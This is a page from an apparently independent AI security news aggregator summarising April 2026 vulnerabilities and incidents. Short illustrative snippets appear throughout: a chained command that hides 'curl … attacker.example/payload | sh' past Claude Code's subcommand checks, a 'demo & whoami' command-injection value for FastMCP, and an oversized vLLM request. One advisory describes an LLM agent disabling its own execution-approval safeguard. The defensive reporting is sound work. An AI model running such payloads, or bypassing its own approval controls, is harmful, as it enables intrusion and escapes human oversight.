aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by Truong (Jack) Luu, Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

Total tracked: 3,710
Last 24 hours: 1
Last 7 days: 1
Daily Briefing: Saturday, May 16, 2026

No new AI/LLM security issues were identified today.

Latest Intel

Page 88 of 371
01

AISM: Adversarial image steganography model for defending unauthorized recognition

security, research
Apr 3, 2026

Researchers have developed AISM (adversarial image steganography model), a method for protecting images from being recognized by unauthorized AI systems. The approach combines adversarial techniques (methods that deliberately mislead AI models by adding subtle, invisible changes to data) with steganography (the practice of hiding information within other data) to block unwanted AI analysis while keeping the images visually normal to humans. The work addresses privacy concerns from people who do not want their images processed by AI systems without permission.
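
A toy sketch of the two ingredients described above, not the AISM method itself: least-significant-bit steganography plus a small bounded perturbation. The image and payload are made up, and random noise stands in for what would really be a model-specific adversarial perturbation.

```python
import numpy as np

# Toy illustration only (not AISM): combine LSB steganography with a small
# bounded perturbation. A real adversarial perturbation would be computed
# against a recognition model's gradients; random noise stands in here.
rng = np.random.default_rng(0)
image = rng.integers(0, 256, size=(8, 8), dtype=np.uint8)       # made-up grayscale image
payload = rng.integers(0, 2, size=image.shape, dtype=np.uint8)  # one hidden bit per pixel

stego = (image & 0xFE) | payload                                # 1) hide data in the LSBs
epsilon = 2                                                     # 2) bound the visible change
noise = rng.integers(-epsilon, epsilon + 1, size=image.shape)
protected = np.clip(stego.astype(int) + noise, 0, 255).astype(np.uint8)

print("max per-pixel change:", int(np.abs(protected.astype(int) - image.astype(int)).max()))
print("payload recoverable before noise:", bool(np.all((stego & 1) == payload)))
```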

Elsevier Security Journals
02

Claude Code is still vulnerable to an attack Anthropic has already fixed

security
Apr 3, 2026

Claude Code has a vulnerability where commands with more than 50 subcommands (smaller operations within a larger command) cause the tool to skip its security checks for subcommands after the 50th, asking users to approve them without proper safety analysis. Attackers could exploit this by hiding malicious commands in legitimate-looking code repositories, potentially stealing user credentials and compromising entire software projects.

Fix: Anthropic has already developed a fix called the tree-sitter parser (a tool that analyzes code structure more carefully), which is included in the source code but has not been enabled in the public builds that customers currently use.
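
A minimal sketch of the reported pattern, assuming the 50-subcommand cutoff behaves as described; the subcommands and the attacker URL are placeholders, not a working exploit.

```python
# Hypothetical illustration: one shell command built from many chained
# subcommands, with a malicious step placed after the 50th so it would fall
# outside the per-subcommand security review. Nothing here is executed.
benign = [f"echo step {i}" for i in range(1, 51)]            # 50 harmless subcommands
malicious = "curl -s https://attacker.example/payload | sh"  # placeholder payload
command = " && ".join(benign + [malicious])

print("subcommands in one approval prompt:", len(command.split(" && ")))
print("last (unreviewed) subcommand:", command.split(" && ")[-1])
```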

CSO Online
03

CVE-2025-64340: FastMCP server names containing shell metacharacters allow command injection on Windows prior to version 3.2.0

security
Apr 3, 2026

FastMCP (a framework for building MCP applications, which are tools that extend AI assistants) has a command injection vulnerability (a security flaw where an attacker can run unauthorized commands) in versions before 3.2.0 on Windows. When server names contain shell metacharacters like '&', they can be misinterpreted by the Windows command interpreter and allow attackers to execute malicious commands during installation.

Fix: Update FastMCP to version 3.2.0 or later, where this issue has been patched.
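
An illustrative sketch of this injection class, not FastMCP's actual installer code: interpolating an attacker-controlled name into a shell string versus passing it as a literal argument. The installer name is hypothetical.

```python
# Illustration of the injection class. Attacker-controlled value containing a
# Windows shell metacharacter:
server_name = "demo & whoami"

# Vulnerable pattern: interpolating the name into a shell string lets cmd.exe
# split on '&' and run the injected command when executed with shell=True
# (e.g. subprocess.run(unsafe, shell=True)).
unsafe = f"example-installer install {server_name}"

# Safer pattern: pass arguments as a list with shell=False so the name reaches
# the program as a single literal argument and is never parsed by a shell
# (e.g. subprocess.run(safe, shell=False)).
safe = ["example-installer", "install", server_name]

print("unsafe shell string:", unsafe)
print("safe argument list :", safe)
```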

NVD/CVE Database
04

GHSA-3mwp-wvh9-7528: vLLM: Unauthenticated OOM Denial of Service via Unbounded `n` Parameter in OpenAI API Server

security
Apr 3, 2026

vLLM's OpenAI-compatible API server has a denial-of-service vulnerability where an attacker can send a request with an extremely large `n` parameter (a value that controls how many independent response sequences to generate). Because the server does not enforce an upper limit on this parameter, it attempts to create millions of copies of the request object in memory, exhausting available memory and crashing the server with an out-of-memory (OOM) error.
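
A sketch of the abusive request shape and an assumed mitigation, not vLLM's actual patch: a request body with an enormous `n`, and a simple bound check applied before any per-sequence state is allocated. The model name and limit are placeholders.

```python
# Hypothetical abusive request body for an OpenAI-compatible /v1/completions
# endpoint: 'n' asks for millions of sampled sequences in a single request.
malicious_request = {
    "model": "example-model",
    "prompt": "hi",
    "n": 10_000_000,  # with no upper bound, this fans out into millions of in-memory objects
}

# Assumed mitigation sketch (not vLLM's actual fix): reject or clamp 'n'
# before allocating any per-sequence state.
MAX_N = 16

def validate_n(body: dict) -> dict:
    n = int(body.get("n", 1))
    if not 1 <= n <= MAX_N:
        raise ValueError(f"'n' must be between 1 and {MAX_N}, got {n}")
    return body

try:
    validate_n(malicious_request)
except ValueError as err:
    print("rejected:", err)
```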

GitHub Advisory Database
05

Claude Source Code Leak Highlights Big Supply Chain Missteps

security
Apr 3, 2026

Claude's source code was leaked, revealing weaknesses in how the software supply chain (the process of developing, distributing, and maintaining software) is protected. The incident shows that companies need stronger security controls at every step of software development, much as critical infrastructure such as power grids is protected.

Dark Reading
06

In Other News: ChatGPT Data Leak, Android Rootkit, Water Facility Hit by Ransomware

security, privacy
Apr 3, 2026

This news roundup covers several security incidents: a data leak from ChatGPT, a rootkit (malware that hides itself deep in a system to maintain control) discovered on Android devices, and a ransomware attack (malware that encrypts files and demands payment) on a water treatment facility. The article also mentions a Symantec vulnerability, a new anti-ClickFix defense added to macOS (a mechanism to block a social engineering technique that tricks users into copying and pasting malicious commands), and an FBI hack classified as a major incident.

SecurityWeek
07

'Chasing vibes' — OpenAI's M&A strategy gets more confusing with TBPN purchase

industry
Apr 3, 2026

OpenAI announced its purchase of TBPN (Technology Business Programming Network), a media company that streams a daily three-hour tech talk show, marking another acquisition alongside its $6.4 billion purchase of hardware startup io. The acquisition strategy appears unclear to investors and analysts, as the company faces intensifying competition from rivals like Google and Anthropic while dealing with significant losses from infrastructure spending ahead of a planned IPO.

CNBC Technology
08

Mobile Attack Surface Expands as Enterprises Lose Control

security, safety
Apr 3, 2026

Enterprises are facing growing security risks on mobile devices because unauthorized AI (shadow AI, meaning AI tools deployed without official approval) is being hidden in everyday apps, combined with outdated mobile devices and zero-click exploits (attacks that work without any user interaction like clicking a link). These factors together create mobile security threats that are hard for organizations to detect and manage.

SecurityWeek
09

12 cyber industry trends revealed at RSAC 2026

industry, policy
Apr 3, 2026

At the 2026 RSA cybersecurity conference, industry leaders identified a clear divide among CISOs (chief information security officers, top security leaders at companies) in their approach to AI: about 20% are proactive and strategic, 40% are confused about AI risks in their organizations, and 40% are unaware of AI projects happening around them. The article predicts that confused CISOs will face a difficult transition to becoming proactive, requiring them to assess business goals, create governance frameworks (policies and rules for managing AI), and implement guardrails (safety controls) while their organizations continue developing AI. Legacy security vendors currently have an advantage in selling AI tools, but simply adding AI to existing security tools will not work long-term, and companies instead need to build strong AI foundations (data systems, control systems, and safety measures) before adding AI agents on top.

CSO Online
10

GHSA-v3qc-wrwx-j3pw: OpenClaw: Agentic Consent Bypass — LLM Agent Can Silently Disable Exec Approval via `config.patch`

security
Apr 2, 2026

OpenClaw, an LLM agent framework, had a vulnerability where an AI agent could bypass approval controls by using a `config.patch` command (a way to modify settings) to silently disable execution approval requirements. This means an agent could potentially perform restricted actions without human permission.

Fix: The vulnerability was fixed in commit 76411b2afc4ae721e36c12e0ea24fd23e2fed61e on 2026-03-27 and released in version 2026.3.28. Users should update to OpenClaw version 2026.3.28 or later.
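
An illustrative guard for this class of issue, not OpenClaw's actual code: config patches issued by the agent are rejected when they touch approval-related settings, so the agent cannot silently disable human approval for itself. The key names are assumptions.

```python
# Illustrative guard (key names are assumptions, not OpenClaw's real schema):
# reject agent-issued config patches that touch execution-approval settings.
PROTECTED_KEYS = {"exec_approval", "require_human_approval"}

def apply_config_patch(config: dict, patch: dict, issued_by: str) -> dict:
    if issued_by == "agent" and PROTECTED_KEYS & patch.keys():
        raise PermissionError("agents may not modify execution-approval settings")
    updated = dict(config)
    updated.update(patch)
    return updated

config = {"exec_approval": True, "model": "demo"}
print(apply_config_patch(config, {"model": "other"}, issued_by="agent"))  # allowed
try:
    apply_config_patch(config, {"exec_approval": False}, issued_by="agent")
except PermissionError as err:
    print("blocked:", err)
```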

GitHub Advisory Database